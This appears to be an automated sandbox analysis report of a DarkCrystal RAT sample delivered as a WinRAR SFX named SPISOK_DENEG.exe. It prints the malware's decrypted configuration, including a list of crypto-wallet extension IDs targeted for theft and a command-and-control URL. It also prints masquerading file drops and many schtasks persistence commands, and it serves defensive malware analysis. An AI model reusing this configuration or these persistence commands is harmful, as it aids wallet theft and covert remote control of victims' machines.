                                  Source: 00000000.00000003.1672714236.0000000007058000.00000004.00000020.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"False"}}
                                  Source: 00000000.00000003.1672714236.0000000007058000.00000004.00000020.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-NVL90ijyTJenukKzbFMD","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                                  Source: 00000000.00000003.1672714236.0000000007058000.00000004.00000020.00020000.00000000.sdmpString decryptor: [["http://77777cm.nyashtyan.in/","externalpipejsprocessAuthapiDbtrackWordpressCdn"]]
                                  Source: SPISOK_DENEG.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: SPISOK_DENEG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: SPISOK_DENEG.exe
                                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.pdb source: ChainPortsurrogate.exe, 00000004.00000002.1795261903.00000000033B3000.00000004.00000800.00020000.00000000.sdmp

                                  Spreading

                                  barindex
                                  Infects executable files (exe, dll, sys, html)
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_000DA69B
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_000EC220
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile opened: C:\Users\userJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile opened: C:\Users\user\AppDataJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                                  Networking

                                  barindex
                                  Suricata IDS alerts for network traffic
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49736 -> 104.21.16.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49739 -> 104.21.16.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49740 -> 104.21.16.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49741 -> 104.21.16.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49880 -> 104.21.16.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49897 -> 104.21.16.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49827 -> 104.21.16.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49926 -> 104.21.16.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50012 -> 104.21.16.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50016 -> 104.21.16.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50017 -> 104.21.16.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49738 -> 104.21.16.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50013 -> 104.21.16.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50015 -> 104.21.16.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50014 -> 104.21.16.1:80
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global trafficDNS traffic detected: DNS query: 77777cm.nyashtyan.in
                                  Source: ChainPortsurrogate.exe, 00000004.00000002.1795261903.00000000033B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                                  System Summary

                                  barindex
                                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000D6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_000D6FAA
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\Windows\debug\backgroundTaskHost.exeJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\Windows\debug\eddb19405b7ce1Jump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC623D5433D49749E7B14E19B0BB4799F.TMPJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC623D5433D49749E7B14E19B0BB4799F.TMPJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000D848E0_2_000D848E
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000E40880_2_000E4088
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000E00B70_2_000E00B7
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000D40FE0_2_000D40FE
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000E71530_2_000E7153
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000F51C90_2_000F51C9
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000E62CA0_2_000E62CA
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000D32F70_2_000D32F7
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000E43BF0_2_000E43BF
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000DC4260_2_000DC426
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000FD4400_2_000FD440
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000DF4610_2_000DF461
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000E77EF0_2_000E77EF
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000D286B0_2_000D286B
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000FD8EE0_2_000FD8EE
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000DE9B70_2_000DE9B7
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_001019F40_2_001019F4
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000E6CDC0_2_000E6CDC
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000E3E0B0_2_000E3E0B
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000F4F9A0_2_000F4F9A
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000DEFE20_2_000DEFE2
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeCode function: 4_2_00007FFD9BA080284_2_00007FFD9BA08028
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeCode function: 4_2_00007FFD9BA0C4254_2_00007FFD9BA0C425
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeCode function: 4_2_00007FFD9BA0C3504_2_00007FFD9BA0C350
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeCode function: 4_2_00007FFD9BA0A6904_2_00007FFD9BA0A690
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeCode function: 4_2_00007FFD9BA08E704_2_00007FFD9BA08E70
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeCode function: 4_2_00007FFD9BA012224_2_00007FFD9BA01222
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeCode function: 4_2_00007FFD9BA08E7F4_2_00007FFD9BA08E7F
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeCode function: 4_2_00007FFD9BA148EE4_2_00007FFD9BA148EE
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeCode function: 4_2_00007FFD9BB7DD624_2_00007FFD9BB7DD62
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeCode function: 4_2_00007FFD9BB7CFB64_2_00007FFD9BB7CFB6
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeCode function: 8_2_00007FFD9BA012228_2_00007FFD9BA01222
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeCode function: 29_2_00007FFD9B9E122229_2_00007FFD9B9E1222
                                  Source: C:\Users\Default\Documents\dllhost.exeCode function: 30_2_00007FFD9BA1122230_2_00007FFD9BA11222
                                  Source: C:\Users\Default\Documents\dllhost.exeCode function: 31_2_00007FFD9B9F122231_2_00007FFD9B9F1222
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeCode function: 32_2_00007FFD9BA1122232_2_00007FFD9BA11222
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeCode function: 33_2_00007FFD9BA0122233_2_00007FFD9BA01222
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeCode function: 34_2_00007FFD9BA2122234_2_00007FFD9BA21222
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeCode function: 36_2_00007FFD9BA0122236_2_00007FFD9BA01222
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeCode function: 40_2_00007FFD9BA1122240_2_00007FFD9BA11222
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeCode function: 41_2_00007FFD9B9E122241_2_00007FFD9B9E1222
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeCode function: 43_2_00007FFD9BA0122243_2_00007FFD9BA01222
                                  Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\CqAggkYA.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: String function: 000EF5F0 appears 31 times
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: String function: 000EEC50 appears 56 times
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: String function: 000EEB78 appears 39 times
                                  Source: YsSdHCtI.log.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: UxRLAXDP.log.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: CqAggkYA.log.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: tHgRxHTS.log.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: jYNBNfNl.log.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: SPISOK_DENEG.exe, 00000000.00000003.1675869870.0000000002B95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs SPISOK_DENEG.exe
                                  Source: SPISOK_DENEG.exe, 00000000.00000003.1672714236.0000000007058000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SPISOK_DENEG.exe
                                  Source: SPISOK_DENEG.exe, 00000000.00000003.1671665408.000000000674F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SPISOK_DENEG.exe
                                  Source: SPISOK_DENEG.exe, 00000000.00000003.1672343604.0000000007053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SPISOK_DENEG.exe
                                  Source: SPISOK_DENEG.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SPISOK_DENEG.exe
                                  Source: SPISOK_DENEG.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@56/33@1/0
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000D6C74 GetLastError,FormatMessageW,0_2_000D6C74
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000EA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_000EA6C2
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\Program Files (x86)\jdownloader\config\explorer.exeJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\Users\user\Desktop\YsSdHCtI.logJump to behavior
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeMutant created: NULL
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-NVL90ijyTJenukKzbFMD
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3636:120:WilError_03
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\Users\user\AppData\Local\Temp\ji1uplb1Jump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProviderserverruntimeperfSvc\wnVkTofZircZrFhWJh5AKDNhgeSRpsYNieNXBbC85wZu.bat" "
                                  Source: unknownProcess created: C:\Program Files (x86)\jDownloader\config\explorer.exe
                                  Source: unknownProcess created: C:\Program Files (x86)\jDownloader\config\explorer.exe
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCommand line argument: sfxname0_2_000EDF1E
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCommand line argument: sfxstime0_2_000EDF1E
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCommand line argument: STARTDLG0_2_000EDF1E
                                  Source: SPISOK_DENEG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: SPISOK_DENEG.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeFile read: C:\Windows\win.iniJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: SPISOK_DENEG.exeVirustotal: Detection: 58%
                                  Source: SPISOK_DENEG.exeReversingLabs: Detection: 73%
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeFile read: C:\Users\user\Desktop\SPISOK_DENEG.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\SPISOK_DENEG.exe "C:\Users\user\Desktop\SPISOK_DENEG.exe"
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProviderserverruntimeperfSvc\4oe8qKx4BC4jNir9oLrOplwqP.vbe"
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProviderserverruntimeperfSvc\wnVkTofZircZrFhWJh5AKDNhgeSRpsYNieNXBbC85wZu.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe "C:\ProviderserverruntimeperfSvc/ChainPortsurrogate.exe"
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 5 /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /f
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /rl HIGHEST /f
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 6 /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /rl HIGHEST /f
                                  Source: unknownProcess created: C:\ProviderserverruntimeperfSvc\ctfmon.exe C:\ProviderserverruntimeperfSvc\ctfmon.exe
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline"
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FF6.tmp" "c:\Windows\System32\CSC623D5433D49749E7B14E19B0BB4799F.TMP"
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /f
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /rl HIGHEST /f
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /rl HIGHEST /f
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Documents\dllhost.exe'" /f
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\Documents\dllhost.exe'" /rl HIGHEST /f
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Documents\dllhost.exe'" /rl HIGHEST /f
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /f
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /rl HIGHEST /f
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /rl HIGHEST /f
